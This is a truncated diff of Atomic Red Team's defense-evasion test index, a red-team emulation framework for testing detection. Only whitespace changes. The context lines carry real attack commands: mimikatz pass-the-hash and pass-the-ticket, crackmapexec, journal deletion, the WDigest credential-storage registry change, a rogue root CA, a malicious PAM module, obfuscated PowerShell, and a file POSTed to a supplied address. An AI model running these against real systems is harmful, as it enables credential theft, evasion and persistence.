2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -28525,7 +28525,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells - ' +' supported_platforms: - linux - macos @@ -28691,7 +28691,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files - ' +' supported_platforms: - linux input_arguments: @@ -28726,7 +28726,7 @@ defense-evasion: auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. - ' +' supported_platforms: - linux input_arguments: @@ -28871,10 +28871,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: - ' +' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: - ' +' name: command_prompt elevation_required: true T1202: @@ -28970,7 +28970,7 @@ defense-evasion: executor: command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process} - ' +' name: command_prompt - name: Indirect Command Execution - conhost.exe auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 @@ -28988,7 +28988,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" - ' +' name: command_prompt T1553.004: technique: @@ -29088,7 +29088,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -29115,7 +29115,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl - ' +' supported_platforms: - linux input_arguments: @@ -29131,10 +29131,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29148,7 +29148,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl - ' +' supported_platforms: - macos input_arguments: @@ -29164,10 +29164,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -29175,14 +29175,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" - ' +' name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell - ' +' supported_platforms: - windows input_arguments: @@ -29194,10 +29194,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29219,7 +29219,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil - ' +' supported_platforms: - windows input_arguments: @@ -29231,10 +29231,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) - ' +' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -29242,7 +29242,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} - ' +' cleanup_command: | try { $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My @@ -29331,10 +29331,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29399,10 +29399,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29445,7 +29445,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29470,10 +29470,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29516,7 +29516,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29541,10 +29541,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29587,7 +29587,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29612,10 +29612,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29659,7 +29659,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. - ' +' supported_platforms: - windows input_arguments: @@ -29684,10 +29684,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29730,7 +29730,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. - ' +' supported_platforms: - windows input_arguments: @@ -29755,10 +29755,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29812,10 +29812,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) - ' +' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -29997,7 +29997,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -30013,14 +30013,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -30036,14 +30036,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. - ' +' supported_platforms: - macos - linux @@ -30059,14 +30059,14 @@ defense-evasion: executor: command: 'chmod -R #{numeric_mode} #{file_or_folder} - ' +' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. - ' +' supported_platforms: - macos - linux @@ -30082,14 +30082,14 @@ defense-evasion: executor: command: 'chmod -R #{symbolic_mode} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. - ' +' supported_platforms: - macos - linux @@ -30109,14 +30109,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. - ' +' supported_platforms: - macos - linux @@ -30136,13 +30136,13 @@ defense-evasion: executor: command: 'chown -R #{owner}:#{group} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. - ' +' supported_platforms: - macos - linux @@ -30158,13 +30158,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} - ' +' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. - ' +' supported_platforms: - macos - linux @@ -30180,7 +30180,7 @@ defense-evasion: executor: command: 'chown -R #{owner} #{file_or_folder} - ' +' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -30198,7 +30198,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} - ' +' name: sh T1078.003: technique: @@ -30322,7 +30322,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. - ' +' supported_platforms: - windows input_arguments: @@ -30342,10 +30342,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) - ' +' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}" @@ -30358,7 +30358,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. - ' +' supported_platforms: - windows input_arguments: @@ -30378,10 +30378,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) - ' +' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}" @@ -30504,7 +30504,7 @@ defense-evasion: Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ - ' +' supported_platforms: - windows input_arguments: @@ -30516,20 +30516,20 @@ defense-evasion: dependencies: - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}" executor: command: 'Mount-DiskImage -ImagePath "#{path_of_iso}" - ' +' cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null - ' +' name: powershell - name: Mount an ISO image and run executable from the ISO auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc @@ -30551,10 +30551,10 @@ defense-evasion: dependencies: - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso}) - ' +' prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}" @@ -30588,18 +30588,18 @@ defense-evasion: - description: A test file with the Zone.Identifier attribute must be present. prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 } - ' +' get_prereq_command: | Invoke-WebRequest #{file_to_download} -OutFile #{file_path} Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3' executor: command: 'Unblock-File -Path #{file_path} - ' +' cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value ''[ZoneTransfer]'',''ZoneId=3'' - ' +' name: powershell T1036.004: technique: @@ -30675,7 +30675,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f - ' +' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -30690,7 +30690,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times - ' +' name: command_prompt elevation_required: true T1036: @@ -30840,7 +30840,7 @@ defense-evasion: description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) - ' +' supported_platforms: - macos - linux @@ -31089,11 +31089,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f - ' +' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd @@ -31113,11 +31113,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f - ' +' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -31132,11 +31132,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f - ' +' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone @@ -31177,11 +31177,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "''" - ' +' name: command_prompt T1218.007: technique: @@ -31683,7 +31683,7 @@ defense-evasion: description: 'Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments: @@ -31695,17 +31695,17 @@ defense-evasion: dependencies: - description: 'T1218.msi must exist on disk at specified location (#{msi_payload}) - ' +' prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own MSI" - ' +' executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 @@ -31713,7 +31713,7 @@ defense-evasion: in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. - ' +' supported_platforms: - windows input_arguments: @@ -31724,7 +31724,7 @@ defense-evasion: executor: command: 'msiexec.exe /q /i "#{msi_payload}" - ' +' name: command_prompt - name: Msiexec.exe - Execute Arbitrary DLL auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec @@ -31743,17 +31743,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'msiexec.exe /y "#{dll_payload}" - ' +' name: command_prompt T1564.004: technique: @@ -31893,7 +31893,7 @@ defense-evasion: Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`"" cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore - ' +' name: powershell - name: Create ADS command prompt auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb @@ -31917,7 +31917,7 @@ defense-evasion: for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' name: command_prompt - name: Create ADS PowerShell auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 @@ -31939,13 +31939,13 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'New-Item -Path #{file_name} | Out-Null - ' +' executor: command: | echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" @@ -31953,7 +31953,7 @@ defense-evasion: set-content -path . -stream #{ads_filename} -value "test3" cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' name: powershell T1599.001: technique: @@ -32162,7 +32162,7 @@ defense-evasion: auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131 description: 'Add a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments: @@ -32179,7 +32179,7 @@ defense-evasion: auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222' description: 'Removes a Network Share utilizing the command_prompt - ' +' supported_platforms: - windows input_arguments: @@ -32190,13 +32190,13 @@ defense-evasion: executor: command: 'net share #{share_name} /delete - ' +' name: command_prompt - name: Remove Network Share PowerShell auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3 description: 'Removes a Network Share utilizing PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -32443,14 +32443,14 @@ defense-evasion: cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage} - ' +' name: powershell - name: Execution from Compressed File auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f description: 'Mimic execution of compressed executable. When successfully executed, calculator.exe will open. - ' +' supported_platforms: - windows input_arguments: @@ -32462,11 +32462,11 @@ defense-evasion: dependencies: - description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe - ' +' prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip" @@ -32474,7 +32474,7 @@ defense-evasion: executor: command: '"%temp%\temp_T1027.zip\T1027.exe" - ' +' cleanup_command: | taskkill /f /im calculator.exe >nul 2>nul rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul @@ -32508,7 +32508,7 @@ defense-evasion: command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test'' -Attachments #{input_file} -SmtpServer #{smtp_server} - ' +' name: powershell - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 @@ -32529,7 +32529,7 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} - ' +' name: powershell - name: Obfuscated Command in PowerShell auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f @@ -32537,7 +32537,7 @@ defense-evasion: "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows executor: @@ -32548,7 +32548,7 @@ defense-evasion: 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) - ' +' name: powershell - name: Obfuscated Command Line using special Unicode characters auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f @@ -32646,7 +32646,7 @@ defense-evasion: auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 description: 'Execute arbitrary DLL file stored locally. - ' +' supported_platforms: - windows input_arguments: @@ -32658,17 +32658,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"} - ' +' name: command_prompt T1134.004: technique: @@ -32781,10 +32781,10 @@ defense-evasion: dependencies: - description: 'DLL to inject must exist on disk at specified location (#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -32825,7 +32825,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -32854,7 +32854,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' @@ -32884,7 +32884,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -32920,7 +32920,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33020,13 +33020,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" - ' +' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec - ' +' supported_platforms: - windows input_arguments: @@ -33055,14 +33055,14 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) - ' +' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} - ' +' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -33143,7 +33143,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -33151,7 +33151,7 @@ defense-evasion: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -33160,10 +33160,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -33174,7 +33174,7 @@ defense-evasion: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" - ' +' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -33217,19 +33217,19 @@ defense-evasion: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) - ' +' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} - ' +' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33312,7 +33312,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -33325,14 +33325,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -33754,10 +33754,10 @@ defense-evasion: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -33791,35 +33791,35 @@ defense-evasion: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed 